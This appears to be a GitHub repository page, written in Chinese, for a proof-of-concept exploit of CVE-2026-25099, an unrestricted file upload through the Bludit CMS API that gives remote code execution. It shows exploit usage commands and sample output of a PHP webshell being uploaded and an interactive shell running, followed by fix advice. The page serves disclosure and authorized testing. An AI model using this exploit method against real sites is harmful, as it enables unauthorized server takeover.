yahiahamza/CVE-2026-25099

GitHub: yahiahamza/CVE-2026-25099

针对 Bludit CMS 3.18.4 之前版本 API 文件上传漏洞的 PoC 利用工具,可实现认证后远程代码执行。

Stars: 0 | Forks: 0

# CVE-2026-25099 - Bludit CMS API 无限制文件上传导致远程代码执行 (RCE) ## 描述 Bludit CMS 3.18.4 之前的版本允许拥有有效 API token 的已认证攻击者通过 `POST /api/files/` 端点上传任意类型和扩展名的文件。`uploadFile()` 函数未执行任何文件扩展名或内容验证,导致 PHP webshell 可被上传并以 `www-data` 权限执行。 ## 受影响版本 - **易受攻击:** Bludit < 3.18.4 - **已修复:** Bludit 3.18.4 - **前置条件:** 有效的 API token(可在管理面板的 Plugins → API 下查看) ## 用法 ``` # 单命令执行 python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id" # 交互式 shell python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" ``` ## 示例输出 ``` [*] CVE-2026-25099 - Bludit CMS API File Upload to RCE [*] Target: http://target [*] Retrieving page key... [+] Page key: create-your-own-content [*] Uploading webshell... [+] Shell uploaded: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php [*] Verifying RCE... [+] RCE confirmed: uid=33(www-data) gid=33(www-data) groups=33(www-data) [+] Interactive shell (type 'exit' to quit) shell> whoami www-data shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php define('BLUDIT_VERSION', '3.18.2'); ``` ## 截图 ![PoC Execution](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/7f4d28e031144303.jpg) ## 修复建议 - 更新至 Bludit 3.18.4 或更高版本 - 如果不需要,请禁用 API 插件 - 监控 `/bl-content/uploads/` 目录中是否有异常 PHP 文件 ## 参考 - [MITRE 上的 CVE-2026-25099](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25099) - [技术分析 - yh.do](https://yh.do/cve-2026-25099-bludit-api-file-upload-rce/) ## 作者 **Yahia Hamza** - [https://yh.do](https://yh.do) ## 免责声明 本工具仅供授权安全测试和教育目的使用。请负责任地使用,并仅针对您拥有测试权限的系统。
标签:API 安全, Bludit CMS, CVE-2026-25099, Exploit, PHP 漏洞, PoC, Python, Python脚本, RCE, Webshell, 任意文件上传, 内容管理系统, 协议分析, 文件上传漏洞, 无后门, 暴力破解, 权限提升, 编程工具, 网络信息收集, 网络安全, 认证后漏洞, 远程代码执行, 隐私保护